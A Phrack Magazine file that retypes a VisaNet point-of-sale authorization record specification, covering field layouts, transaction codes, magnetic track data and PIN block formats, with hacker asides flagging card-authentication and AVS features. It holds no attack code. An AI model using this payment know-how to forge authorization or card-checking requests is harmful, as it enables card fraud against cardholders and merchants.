The ``interactive computer conferencing system'' -- build your private IRC! CRYPTO Dialcom's encryption program. Something they're probably going to love on sci.crypt. NUSAGE By far one of the better things to do on Dialcom, it was left out of this file because it is simply huge. This program allows the user (typically an administrator) to monitor network usage, sort the data, store it, peek into all the little details (virtual connection types, remote/local addresses, actions, time, commands, etc). Unfortunately, it's completely beyond the scope of this file, as there are tons of switches and options to use in order to put this program to effective use. ==Phrack Magazine== Volume Five, Issue Forty-Six, File 15 of 28 **************************************************************************** visanetoperations; part1 obtainedandcompiled by icejey /\ lowerfeldafederationforundercasing iiu delamolabz chuchofthenoncomformist && theilluminatibarbershopquartet greetz2; drdelam maldoror greenparadox kaleidox primalscream reddeath kerryk -------------------------- [ typed in true(c) 80 columns] ---------------------- ---------------------------- [ comments appear in []s ] ------------------------ [ section one ] [ from the word of god ] ------------------------------------------------------------- | XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX | | XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX | | \\\\\ ///// ///// //////////// /////\\\\ | | \\\\\ ///// ///// ///// ///// \\\\\ | | \\\\\ ///// ///// /////////// \\\\\\\\\\\\\\ | | \\\\\/// ///// ///// \\\\\\\\\\\\\\\\ | | \\\\\/ ///// //////////// ///// \\\\\ | | XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX | | XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX | ------------------------------------------------------------- EXTERNAL INTERFACE SPECIFICATION -------------------------------- SECOND GENERATION AUTHORIZATION RECORD FORMATS For Record Formats -------------------------- J - PS/2000 REPS G - VisaNet Dial Debit 1.0 INTRODUCTION 2.0 APPLICABLE DOCUMENTS 2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION 2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE 3.0 AUTHORIZATION RECORD FORMATS 3.01 REQUEST RECORD FORMAT 3.02 RESPONSE RECORD FORMAT 4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS 4.01 RECORD FORMAT 4.02 APPLICATION TYPE 4.03 MESSAGE DELIMITER 4.04 ACQUIRER BIN 4.05 MERCHANT NUMBER 4.06 STORE NUMBER 4.07 TERMINAL NUMBER 4.08 MERCHANT CATEGORY CODE 4.09 MERCHANT COUNTRY CODE 4.10 MERCHANT CITY CODE 4.11 TIME ZONE DIFFERENTIAL 4.12 AUTHORIZATION TRANSACTION CODE 4.13 TERMINAL IDENTIFICATION NUMBER 4.14 PAYMENT SERVICE INDICATOR 4.15 TRANSACTION SEQUENCE NUMBER 4.16 CARDHOLDER IDENTIFICATION DATA 4.17 ACCOUNT DATA SOURCE 4.18 CUSTOMER DATA FIELD 4.18.1 TRACK 1 READ DATA 4.18.2 TRACK 2 READ DATA 4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD) 4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER 4.18.3.2 MANUALLY ENTERED EXPIRATION DATE 4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER 4.18.4.1 CHECK ACCEPTANCE ID 4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA 4.19 FIELD SEPARATOR 4.20 CARDHOLDER IDENTIFICATION DATA 4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID 4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID 4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID 4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [hmmm...] 4.21 FIELD SEPARATOR 4.22 TRANSACTION AMOUNT 4.23 FIELD SEPARATOR 4.24 DEVICE CODE/INDUSTRY CODE 4.25 FIELD SEPARATOR 4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID 4.27 FIELD SEPARATOR 4.28 SECONDARY AMOUNT (CASHBACK) 4.29 FIELD SEPARATOR 4.30 MERCHANT NAME 4.31 MERCHANT CITY 4.32 MERCHANT STATE 4.33 SHARING GROUP 4.34 FIELD SEPARATOR 4.35 MERCHANT ABA NUMBER 4.36 MERCHANT SETTLEMENT AGENT NUMBER 4.37 FIELD SEPARATOR 4.38 AGENT NUMBER 4.39 CHAIN NUMBER 4.40 BATCH NUMBER 4.41 REIMBURSEMENT ATTRIBUTE 4.42 FIELD SEPARATOR 4.43 APPROVAL CODE 4.44 SETTLEMENT DATE 4.45 LOCAL TRANSACTION DATE 4.46 LOCAL TRANSACTION TIME 4.47 SYSTEM TRACE AUDIT NUMBER 4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE 4.49 NETWORK IDENTIFICATION CODE 4.50 FIELD SEPARATOR 5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS 5.01 PAYMENT SERVICE INDICATOR 5.02 STORE NUMBER 5.03 TERMINAL NUMBER 5.04 AUTHORIZATION SOURCE CODE 5.05 TRANSACTION SEQUENCE NUMBER 5.06 RESPONSE CODE 5.07 APPROVAL CODE 5.08 LOCAL TRANSACTION DATE 5.09 AUTHORIZATION RESPONSE CODE 5.10 AVS RESULT CODE 5.11 TRANSACTION IDENTIFIER 5.12 FIELD SEPARATOR 5.13 VALIDATION CODE 5.14 FIELD SEPARATOR 5.15 NETWORK IDENTIFICATION CODE 5.16 SETTLEMENT DATE 5.17 SYSTEM TRACE AUDIT NUMBER 5.18 RETRIEVAL REFERENCE NUMBER 5.19 LOCAL TRANSACTION TIME 6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS 6.01 NETWORK IDENTIFICATION CODE 6.02 SETTLEMENT DATE 6.03 SYSTEM TRACE AUDIT NUMBER 7.0 CHARACTER CODE DEFINITIONS 7.01 TRACK 1 CHARACTER DEFINITION 7.02 TRACK 2 CHARACTER DEFINITION 7.03 AUTHORIZATION MESSAGE CHARACTER SET 7.04 CHARACTER CONVERSION SUMMARY 7.05 ACCOUNT DATA LUHN CHECK 7.06 CALCULATING AN LRC 7.07 TEST DATA FOR RECORD FORMAT "J" 7.07.1 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST 7.07.2 RESPONSE MESSAGE FOR TEST DATA ------------------------------------------------------------------------------- 1.0 INTRODUCTION This document describes the request and response record formats for the VisaNet second generation Point-Of-Sale (POS) authorization terminals and VisaNet Authorization services. This document describes only record formats. Other documents describe communication protocols and POS equipment processing requirements. Figure 1.0 represents the authorization request which is transmitted to VisaNet using public communication services and the authorization response returned by VisaNet. Debit transactions include a third confirmation message. POS DEVICE VISANET ---------- ------- AUTHORIZATION REQUEST | TRANSMITTED TO A |----------> VISANET AUTHORIZATION AUTHORIZATION RESPONSE HOST SYSTEM | | RETURNED BY THE | VISANET HOST TO <--------| THE POS TERMINAL DEBIT RESPONSE CONFIRMATION--------------->TRANSMITTED TO HOST SYSTEM FIGURE 1.0 Authorization request and response. This document describes the record formats to be used for the development of new applications. Current formats or transition formats will be provided on request. The usage of some fields have changed with the new record formats. Applications which were developed to previous specifications will continue to be supported by VisaNet services. The new formats and field usage is provided with the intention of moving all new applications developed to the new formats. 2.0 APPLICABLE DOCUMENTS The following documents provide additional definitions and background. 2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION 1. EIS1051 - External Interface Specification Second Generation Authorization Link Level Protocol 2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE 1. EIS1081 - External Interface Specification Second Generation Data Capture Record Formats 2. EIS1052 - External Interface Specification Second Generation Data Capture Link Level Protocol 3.0 AUTHORIZATION RECORD FORMATS This section contains the record formats for the authorization request, response and confirmation records. The ANSI X3.4 character set is used to represent all record data elements. (See Section 7) In the record formats on the following pages, the column heading FORMAT is defined as: "NUM" represents numeric data, the numbers 0 through 9, NO SPACES. "A/N" represents alphanumeric data, the printing character set. "FS" represents a field separator character as defined in ANSI X3.4 as a "1C" hex 3.01 REQUEST RECORD FORMAT Table 3.01b provides the record format for the authorization request records. Section 4 provides the data element definitions. The authorization request record is a variable length record. The record length will depend on the source of the customer data and the type of authorization request. Refer to Table 3.01c to determine which GROUPS to use from Table 3.01a TABLE 3.01a IS PROVIDED FOR REFERENCE REASONS ONLY. ALL NEW APPLICATIONS SHOULD USE ONE OF THE FOLLOWING RECORD FORMATS: RECORD | APPLICATION | FORMAT | TYPE | REMARKS ------------------------------------------------------------------------------- J | CREDIT | All non-ATM card transactions (Visa cards, other credit | | cards, private label credit cards and check guarantee) G | DIAL DEBIT | Visa supported ATM debit cards The selection of format type J and G or any other value from Table 3.01a will depend on the VisaNet services that are desired. Contact your Visa POS member support representative for assistance in determining the required formats. TABLE 3.01a Record Format Summary Non-CVV CVV Terminal Compliant Compliant Generation Description ------------------------------------------------------------------------------- 0 RESERVED 1 N First Vutran 2 8 First Sweda 4 R First Verifone 6 P First Amex 7 3 First Racal A Q First DMC B R First GTE & Omron [velly intelestink] C 9 First Taltek S U First Datatrol - Standard Oil D T First Datatrol E RESERVED 5 F Second Non-REPS-Phase 1 CVV G Second Dial Debit H Second Non-REPS-Phase 2 CVV I Second RESERVED - Non-REPS Controller J Second REPS - Terminal & Controller K Second RESERVED L Second RESERVED - Leased VAP M Second RESERVED - Member Format N-O RESERVED V-Y RESERVED Z Second RESERVED - SDLC Direct [hmmm] ------------------------------------------------------------------------------- TABLE 3.01b Second Generation Authorization Request Record Format see Group Byte# Length Format Name section ------------------------------------------------------------------------------- 1 1 A/N Record Format 4.01 2 1 A/N Application Type 4.02 3 1 A/N Message Delimiter 4.03 4-9 6 NUM Acquirer Bin 4.04 10-21 12 NUM Merchant Number 4.05 22-25 4 NUM Store Number 4.06 26-29 4 NUM Terminal Number 4.07 30-33 4 NUM Merchant Category Code 4.08 34-36 3 NUM Merchant Country Code 4.09 37-41 5 A/N Merchant City Code (ZIP in the U.S.) 4.10 42-44 3 NUM Time Zone Differential 4.11 45-46 2 A/N Authorization Transaction Code 4.12 47-54 8 NUM Terminal Identification Number 4.13 55 1 A/N Payment Service Indicator 4.14 56-59 4 NUM Transaction Sequence Number 4.15 60 1 A/N Cardholder Identification Code 4.16 61 1 A/N Account Data Field 4.17 Variable 1-76 Customer Data Field 4.18.x (See: DEFINITIONS in Table 3.01d) Variable 1 "FS" Field Separator 4.19 Variable 0-32 A/N Cardholder Identification Data 4.20 Variable 1 "FS" Field Separator 4.21 Variable 3-12 NUM Transaction Amount 4.22 Variable 1 "FS" Field Separator 4.23 Variable 2 A/N Device Code/Industry Code 4.24 Variable 1 "FS" Field Separator 4.25 Variable 0-6 NUM Issuing/Receiving Institution ID 4.26 I Variable 1 "FS" Field Separator 4.27 Variable 3-12 NUM Secondary Amount (Cashback) 4.28 II Variable 1 "FS" Field Separator 4.29 Variable 25 A/N Merchant Name 4.30 Variable 13 A/N Merchant City 4.31 Variable 2 A/N Merchant State 4.33 Variable 1-14 A/N Sharing Group 4.33 Variable 1 "FS" Field Separator 4.34 Variable 0-12 NUM Merchant ABA 4.35 Variable 0-4 NUM Merchant Settlement Agent Number 4.36 Variable 1 "FS" Field Separator 4.37 Variable 6 NUM Agent Number 4.38 Variable 6 NUM Chain Number 4.39 Variable 3 NUM Batch Number 4.40 Variable 1 A/N Reimbursement Attribute 4.41 III Variable 1 "FS" Field Separator 4.42 Variable 6 A/N Approval Code 4.43 Variable 4 NUM Settlement Date (MMDD) 4.44 Variable 4 NUM Local Transaction Date (MMDD) 4.45 Variable 6 NUM Local Transaction Time (HHMMSS) 4.46 Variable 6 A/N System Trace Audit Number 4.47 Variable 2 A/N Original Auth. Transaction Code 4.48 Variable 1 A/N Network Identification Code 4.49 IV Variable 1 "FS" Field Separator 4.50 NOTE: The maximum length request can be as long as 290 bytes for an Interlink Debit Cancel request (including the STX/ETX/LRC). Since some terminals may be limited to a 256 byte message buffer, the following tips can save up to 36 bytes: - Limit fields 4.22 and 4.28 to 7 digits - Fields 4.26, 4.35 and 4.36 are not required for a debit request - Field 4.33 can be limited to 10 bytes TABLE 3.01C Legend for GROUP (from Table 3.01b) FOR THESE TRANSACTIONS, USE--------------------------------->GROUPS RECORD I II III IV FORMAT Check guarantee X J Non-ATM card transactions (Visa cards, other X X J credit cards, private label credit cards Visa supported ATM debit cards: Purchase, Return X X X G and Inquiry Request Visa supported ATM debit cards: Interlink Cancel X X X X G Request TABLE 3.01d Definitions for Customer Data Field (from Table 3.01b) Length Format Field Name See Section MAGNETICALLY read credit cards (SELECT ONE): up to 76 A/N Track 1 Read Data 4.18.1 up to 37 NUM Track 2 Read Data 4.18.2 MANUALLY entered credit cards: up to 28 NUM Manually Entered Account Number 4.18.3.1 1 "FS" Field Separator 4 NUM Manually Entered Expiration Date (MMYY) 4.18.3.2 MACHINE read and MANUALLY entered check acceptance requests: 1 to 28 A/N Check Acceptance ID 4.18.4.1 1 "FS" Field Separator 4.18.4.2 3 to 6 A/N Manually Entered Check Acceptance Data 4.18.4.2 MAGNETICALLY read ATM debit cards: up to 37 NUM Track 2 Read Data 4.18.2 3.02 RESPONSE RECORD FORMAT Table 3.02a provides the record format for the authorization response records. Section 5 provides the data element definitions. The authorization response record is variable length for record formats "J" & "G". Refer to Table 3.02b to determine which GROUPS to use from Table 3.02a. Table 3.02a Second Generation Authorization Response Record see Group Byte# Length Format Name section -------------------------------------------------------------------------------- 1 1 A/N Payment Service Indicator 5.01 2-5 4 NUM Store Number 5.02 6-9 4 NUM Terminal Number 5.03 10 1 A/N Authorization Source Code 5.04 11-14 4 NUM Transaction Sequence Number 5.05 15-16 2 A/N Response Code 5.06 17-22 6 A/N Approval Code 5.07 23-28 6 NUM Local Transaction Date (MMDDYY) 5.08 29-44 16 A/N Authorization Response Message 5.09 45 1 A/N AVS Result Code 5.10 Variable 0/15 NUM Transaction Identifier 5.11 Variable 1 "FS" Field Separator 5.12 Variable 0/4 A/N Validation Code 5.13 I Variable 1 "FS" Field Separator 5.14 Variable 1 A/N Network Identification Code 5.15 Variable 4 NUM Settlement Date (MMDD) 5.16 Variable 6 A/N System Trace Audit Number 5.17 Variable 12 A/N Retrieval Reference Number 5.18 II Variable 6 NUM Local Transaction Time (HHMMSS) 5.19 Table 3.02b Legend for GROUP (from Table 3.02a) FOR THESE TRANSACTIONS, USE--------------------------------->GROUPS RECORD I II FORMAT All non-ATM card transactions (Visa cards, other credit X J cards, private label credit cards and check guarantee) Visa supported ATM debit cards: Purchase, Return, Inquiry X X G Request and Interlink Cancel Request 3.03 CONFIRMATION RECORD FORMAT (ATM DEBIT ONLY) Table 3.03 provides the record format for the second generation debit response confirmation record. Section 6 provides the data element definitions. The debit response confirmation record is a fixed length record. TABLE 3.03 Second Generation Debit Response Confirmation Record see Group Byte# Length Format Name section -------------------------------------------------------------------------------- 1 1 A/N Network ID Code 6.01 2-5 4 NUM Settlement Date (MMDD) 6.02 I 6-11 6 A/N System Trace Audit Number 6.03 4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS The following subsections will define the authorization request record data elements. 4.01 RECORD FORMAT There are several message formats defined within the VisaNet systems. The second generation authorization format is specified by placing one of the defined values in the record format field. Table 4.01 provides a brief summary of the current formats. TABLE 4.01 VisaNet Authorization Record Format Designators RECORD FORMAT RECORD DESCRIPTION -------------------------------------------------------------------------------- J All non-ATM card transactions (Visa cards, other credit cards, private label credit cards and check guarantee) G Visa supported ATM debit cards 4.02 APPLICATION TYPE The VisaNet authorization system supports multiple application types ranging from single thread first generation authorization to interleaved leased line authorization processing. Table 4.02 provides a summary of application type. TABLE 4.02 VisaNet Application Designators APPLICATION USE WITH TYPE APPLICATION DESCRIPTION REC. FMT. -------------------------------------------------------------------------------- 0 Single authorization per connection J and G 2 Multiple authorizations per connection J and G single-threaded 4 Multiple authorizations per connect, J interleaved 6 Reserved for future use --- 8 Reserved for future use --- 1,3,5,7 Reserved for VisaNet Central Data Capture (CDC) --- 9 Reserved for VisaNet Down Line Load --- A-Z Reserved for future use --- 4.03 MESSAGE DELIMITER The message delimiter separates the format and application type designators from the body of the message. The message delimiter is defined as a "." (period) 4.04 ACQUIRER BIN This field contains the Visa assigned six-digit Bank Identification Number (BIN) The acquirer BIN identifies the merchant signing member that signed the merchant using the terminal. NOTE: The merchant receives this number from their signing member. 4.05 MERCHANT NUMBER This field contains a NON-ZERO twelve digit number, assigned by the signing member and/or the merchant, to identify the merchant within the member systems. The combined Acquirer BIN and Merchant Number are required to identify the merchant within the VisaNet systems. 4.06 STORE NUMBER This field contains a NON-ZERO four-digit number assigned by the signing member and/or the merchant to identify the merchant store within the member systems. The combined Acquirer BIN, Merchant Number, and Store Number are required to identify the store within the VisaNet systems. 4.07 TERMINAL NUMBER This field contains a NON-ZERO four-digit number assigned by the signing member and/or the merchant to identify the merchant store within the member systems. This field can be used by systems which use controllers and/or concentrators to identify the devices attached to the controllers and/or concentrators. 4.08 MERCHANT CATEGORY CODE This field contains a four-digit number assigned by the signing member from a list of category codes defined in the VisaNet Merchant Data Standards Handbook to identify the merchant type. 4.09 MERCHANT COUNTRY CODE This field contains a three-digit number assigned by the signing member from a list of country codes defined in the VisaNet V.I.P. System Message Format Manuals to identify the merchant location country. 4.10 MERCHANT CITY CODE This field contains a five character code used to further identify the merchant location. Within the United States, the give high order zip code digits of the address of the store location are used. Outside of the United States, this field will be assigned by the signing member. 4.11 TIME ZONE DIFFERENTIAL This field contains a three-digit code used to calculate the local time within the VisaNet authorization system. It is calculated by the signing member, providing the local time zone differential from Greenwich Mean Time (GMT). The first two digits specify the magnitude of the differential. Table 4.11 provides a brief summary of the Time Zone Differential codes. TABLE 4.11 Time Zone Differential Code Format Byte # Length Format Contents -------------------------------------------------------------------------------- 1 1 NUMERIC DIRECTION 0 = Positive, Local Ahead of GMT, offset in hours 1 = Negative, Local Time behind GMT, offset in hours 2 = Positive, offset in 15 minute increments 3 = Negative, offset in 15 minute increments 4 = Positive, offset in 15 minute increments, participating in daylight savings time 5 = Negative, offset in 15 minute increments, participating in daylight savings time 6-9 = INVALID CODES 2-3 2 NUMERIC MAGNITUDE For Byte #1 = 0 or 1 0 <= MAGNITUDE <= 12 For Byte #1 = 2 through 5 0 <= MAGNITUDE <= 48 -------------------------------------------------------------------------------- A code of 108 indicates the local Pacific Standard time which is 8 hours behind GMT. 4.12 AUTHORIZATION TRANSACTION CODE This field contains a two-character code defined by VisaNet and generated by the terminal identifying the type of transaction for which the authorization is requested. Table 4.12 provides a summary of the transaction codes. TABLE 4.12 Authorization Transaction Codes TRAN CODE TRANSACTION DESCRIPTION ------------------------------------------------------------------------------- 54 Purchase 55 Cash Advance 56 Mail/Telephone Order 57 Quasi Cash 58 Card Authentication - Transaction Amt & Secondary Amt must equal $0.00, AVS may be requested [ah-hah!] 64 Repeat: Purchase 65 Repeat: Cash Advance 66 Repeat: Mail/Telephone Order (MO/TO) 67 Repeat: Quasi Cash 68 Repeat: Card Authentication - Transaction Amt & Secondary Amt must equal $0.00, AVS may be requested 70 Check guarantee, must include RIID (field 4.26) 81 Proprietary Card 84 Private Label Purchase 85 Private Label, Cash Advance 86 Private Label Mail/Telephone Order (MO/TO) 87 Private Label Quasi Cash 88 Private Label Card Authentication - Transaction Amt & Secondary Amt must equal $0.00, AVS may be requested 93 Debit Purchase 94 Debit Return 95 Interlink Debit Cancel (see NOTE below) -------------------------------------------------------------------------------- NOTE (for TRANSACTION CODE = 95) -------------------------------- - For Interlink Debit CANCEL request message, all of the fields in Groups I and II will come from the original transaction request or the original transaction response, with the exception of the following: - The AUTHORIZATION TRANSACTION CODE will need to be changed to the Debit CANCEL code. - The TRANSACTION SEQUENCE NUMBER should be incremented in the normal fashion. - The CUSTOMER DATA FIELD and the CARDHOLDER IDENTIFICATION DATE (PIN) will need to be re-entered. 4.13 TERMINAL IDENTIFICATION NUMBER This field contains an eight-digit code that must be greater than zero, defined by the terminal down line load support organization. Support may be provided by the Visa's Merchant Assistance Center (MAC), the signing member, or a third party organization. The terminal ID is used to uniquely identify the terminal in the terminal support system and identification for the VisaNet Central Data Capture (CDC). The terminal ID may not be unique within the VisaNet system. Each terminal support provider and member that provides its own terminal support can assign potentially identical terminal IDs within its system. The terminal ID can be used by the terminal down line load system to access the terminal application and parameter data from a system data base when down line loading a terminal. [huh?] NOTE: It is recommended that [the] Terminal ID Number should be unique within the same Acquirer's BIN. 4.14 PAYMENT SERVICE INDICATOR This is a one-character field used to indicate a request for REPS qualification. Table 4.14 provides a summary of the codes. TABLE 4.14 Payment Service Indicator Codes RECORD FORMAT VALUE DESCRIPTION ------------------------------ J Y Yes J N No G Y Yes G N No ------------------------------ [repetitive? you bet] 4.15 TRANSACTION SEQUENCE NUMBER This field contains a four-digit code which is generated by the terminal as the sequence number for the transaction. The sequence number is used by the terminal to match request and response messages. This field is returned by VisaNet without sequence verification. The sequence number is incremented with wrap from 9999 to 0001. 4.16 CARDHOLDER IDENTIFICATION CODE This one-character field contains a code that indicates the method used to identify the cardholder. Table 4.16 provides a summary of the codes. TABLE 4.16 Cardholder Identification Codes ID CODE IDENTIFICATION METHOD -------------------------------------------------------------------------------- A Personal Identification Number-23 byte static key (non-USA) fnord B PIN at Automated Dispensing Machine - 32 byte static key C Self Svc Limited Amount Terminal (No ID method available) D Self-Service Terminal (No ID method available) E Automated Gas Pump (No ID method available) K Personal Identification Number - 32 byte DUK/PT N Customer Address via Address Verification Service (AVS) S Personal Identification Number - 32 byte static key Z Cardholder Signature - Terminal has a PIN pad @ Cardholder Signature - No PIN pad available F-J,L,M,O-R Reserved for future use T-Y -------------------------------------------------------------------------------- 4.17 ACCOUNT DATA SOURCE This field contains a one-character code defined by Visa and generated by the terminal to indicate the source of the customer data entered in field 4.18. Table 4.17 provides a summary of codes TABLE 4.17 Account Data Source Codes ACCOUNT DATA SOURCE CODE ACCOUNT DATA SOURCE CODE DESCRIPTION -------------------------------------------------------------------------------- A RESERVED - Bar-code read B RESERVED - OCR read D Mag-stripe read, Track 2 H Mag-stripe read, Track 1 Q RESERVED - Manually keyed, bar-code capable terminal R RESERVED - Manually keyed, OCR capable terminal T Manually keyed, Track 2 capable X Manually keyed, Track 1 capable @ Manually keyed, terminal has no card reading capability C,E-G,I-P,S, RESERVED for future use U-W,Y-Z,0-9 -------------------------------------------------------------------------------- NOTE: - If a dual track reading terminal is being used, be sure to enter the correct value of "D" or "H" for the magnetic data that is transmitted - When data is manually keyed at a dual track reading terminal, enter either a "T" or an "X" 4.18 CUSTOMER DATA FIELD This is a variable length field containing customer account or check acceptance ID data in one of three formats. The cardholder account information can be read d from the card or it may be entered manually. Additionally the terminal can be used for check authorization processing with the check acceptance identification number entered by the operator for transmission in this field. NOTE: For all POS terminals operated under VISA U.S.A. Operating Regulations, the following requirement must be available as an operating option if the merchant location is found to be generating a disproportionately high percentage of Suspect Transactions [lets get downright hostile about it] as defined in chapter 9.10 of the VISA U.S.A. Operating Regulations. Specifically, chapter 9.10.B.2 requires that: - The terminal must read the track data using a magnetic stripe reading terminal - The terminal must prompt the wage slave to manually enter the last four digits of the account number - The terminal must compare the keyed data with the last four digits of the account number in the magnetic stripe - If the compare is successful, the card is acceptable to continue in the authorization process and the terminal must transmit the full, unaltered contents of the magnetic stripe in the authorization message. - If the compare fails, the card should not be honored at the Point of Sale 4.18.1 TRACK 1 READ DATA This is a variable length field with a maximum data length of 76 characters. The track 1 data read from the cardholder's card is checked for parity and LRC errors and then converted from the six-bit characters encoded on the card to seven-bit characters as defined in ANSI X3.4. The character set definitions are provided in section 7 for reference. As part of the conversion the terminal will strip off the starting sentinel, ending sentinel, and LRC characters. The separators are to be converted to a "^" (HEX 5E) character. The entire track must be provided in the request message. The character set and data content are different between track 1 and track 2. The data read by a track 2 device can not be correctly reformatted and presented as though it were read by a track 1 device. [aw shucks] The converted data can not be modified by adding or deleting non-framing characters and must be a one-for-one representation of the character read from the track. 4.18.2 TRACK 2 READ DATA This is a variable length field with a maximum data length of 37 characters. The track 2 data read from the cardholder's card is checked for parity and LRC errors and then converted from the six-bit characters encoded on the card to seven-bit characters as defined in ANSI X3.4. The character set definitions are provided in section 7 for reference. As part of the conversion the terminal will strip off the starting sentinel, ending sentinel, and LRC characters. The separators are to be converted to a "^" (HEX 5E) character. The entire track must be provided in the request message. The character set and data content are different between track 2 and track 1. The data read by a track 1 device can not be correctly reformatted and presented as though it were read by a track 2 device. The converted data can not be modified by adding or deleting non-framing characters and must be a one-for-one representation of the character read from the track. [repetitive? you bet] 4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD) The customer credit card data may be key entered when the card can not be read, when a card is not present, or when a card reader is not available. 4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER This is a variable length field consisting of 5 to 28 alphanumeric characters. The embossed cardholder data, that is key entered, is validated by the terminal using rules for each supported card type. For example, both Visa and Master Card include a mod 10 check digit as the last digit of the Primary Account Number. The Primary Account Number (PAN) is encoded as seven-bit characters as defined in ANSI X3.4. The PAN is then provided in the manually entered record format provided in Table 3.01b. The PAN must be provided without embedded spaces. 4.18.3.2 MANUALLY ENTERED EXPIRATION DATE This four-digit field contains the card expiration date in the form MMYY (month- month-year-year) 4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER The customer data may be card read or manually key entered for check acceptance transactions. 4.18.4.1 CHECK ACCEPTANCE ID This field is a variable length field consisting of 1 to 28 alphanumeric characters. The check acceptance vendor will provide the data format and validation rules to be used by the terminal. Typically the ID consists of a two-digit state code and an ID which may be the customer's drivers license number. 4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA This six-character field contains the customer birth date or a control code in the form specified by the check acceptance processor. 4.19 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 4.20 CARDHOLDER IDENTIFICATION DATA This field will be 0, 23, 29 or 32 characters in length. The cardholder ID codes shown in Table 4.16 indicates the type of data in this field. Table 4.20 provides a brief summary of the current formats. TABLE 4.20 Cardholder Identification Data Definitions CARDHOLDER VALUE(S) FROM ID LENGTH DESCRIPTION TABLE 4.16 -------------------------------------------------------------------------------- 0 Signature ID used, No PIN pad is present @,C,D or E 0 Signature ID used on a terminal with a PIN pad Z 23 A PIN was entered on a STATIC key PIN pad A 32 A PIN was entered on a STATIC key PIN pad B 32 A PIN was entered on a DUK/PT key PIN pad K 32 A PIN was entered on a STATIC key PIN pad S 0 to 29 AVS was requested N -------------------------------------------------------------------------------- 4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID NOTE: The 23 byte static key technology is NOT approved for use in terminals deployed in the Visa U.S.A. region. [thanks nsa!] When a PIN is entered on a PIN pad supporting 23 byte static key technology, the terminal will generate the following data: 1JFxxyyaaaaaaaaaaaaaaaa Where: 1J Header - PIN was entered f Function Key Indicator - A single byte indicating which, if any, function key was pressed on the PIN pad. This field is currently not edited. Any printable character is allowed. xx PIN Block Format - These two numeric bytes indicate the PIN encryption method used to create the encrypted PIN block. Visa currently supports four methods; 01, 02, 03, & 04. For more information, please refer to the VisaNet Standards Manual, Card Technology Standards, PIN and Security Standards, Section 2, Chapter 3, PIN Block Formats aaaaaaaaaaaaaaaa Expanded Encrypted PIN Block Data - The encrypted PIN block format consists of 64 bits of data. Since the VisaNet Second Generation protocol allows only printable characters in data fields, these 64 bits must be expanded to ensure that no values less than hex "20" are transmitted. To expand the 64 bit encrypted PIN block, remove four bits at a time and convert them to ANSI X3.4 characters using Table 4.20. After this conversion, the 64 bit encrypted PIN block will consist of 16 characters that will be placed in the Expanded Encrypted PIN Block Data field. 4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID When a PIN is entered on a PIN pad supporting 32 byte static key technology, the terminal will generate the following data: aaaaaaaaaaaaaaaa2001ppzz00000000 Where: aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted PIN block format consists of 64 bits of data. Since the VisaNet Second Generation protocol allows only printable characters in data fields, these 64 bits must be expanded to ensure that no values less than hex "20" are transmitted. To expand the 64 bit encrypted PIN block, remove four bits at a time and convert them to ANSI X3.4 characters using table 4.20. After this conversion, the 64 bit encrypted PIN block will consist of 16 characters that will be placed in the Expanded Encrypted PIN Block Data field. 20 - Security Format Code - This code defines that the Zone Encryption security technique was used. 01 - PIN Encryption Algorithm Identifier - This code defines that the ANSI DES encryption technique was used. pp - PIN Block Format Code - This code describes the PIN block format was used by the acquirer. Values are: 01 - Format is based on the PIN, the PIN length, selected rightmost digits of the account number and the pad characters "0" and "F"; combined through an exclusive "OR" operation. 02 - Format is based on the PIN, the PIN length and a user specified numeric pad character. 03 - Format is based on the PIN and the "F" pad character. 04 - Format is the same as "01" except that the leftmost account number digits are selected. zz - Zone Key Index - This index points to the zone key used by the acquirer to encrypt the PIN block. Values are: 01 - First key 02 - Second key 00000000 - Visa Reserved - Must be all zeros For additional information, refer to the VisaNet manual V.I.P. System, Message Formats, Section B: Field Descriptions. Specifically, fields 52 and 53; Personal Identification Number (PIN) Data and Security Related Control Information respectively. 4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID When a PIN is entered on a PIN pad supporting DUK/PT technology, the terminal will generate the following 32 bytes: aaaaaaaaaaaaaaaakkkkkkssssssssss Where: aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted PIN block format consists of 64 bits of data. Since the VisaNet Second Generation protocol allows only printable characters in data fields, these 64 bits must be expanded to ensure that no values less than hex "20" are transmitted. To expand the 64 bit encrypted PIN block, remove four bits at a time and convert them to ANSI X3.4 characters using table 4.20. After this conversion, the 64 bit encrypted PIN block will consist of 16 characters that will be placed in the Expanded Encrypted PIN Block Data field. [repetitive? you bet] kkkkkk - Key Set Identifier (KSID) - Is represented by a unique, Visa Visa assigned, six digit bank identification number. 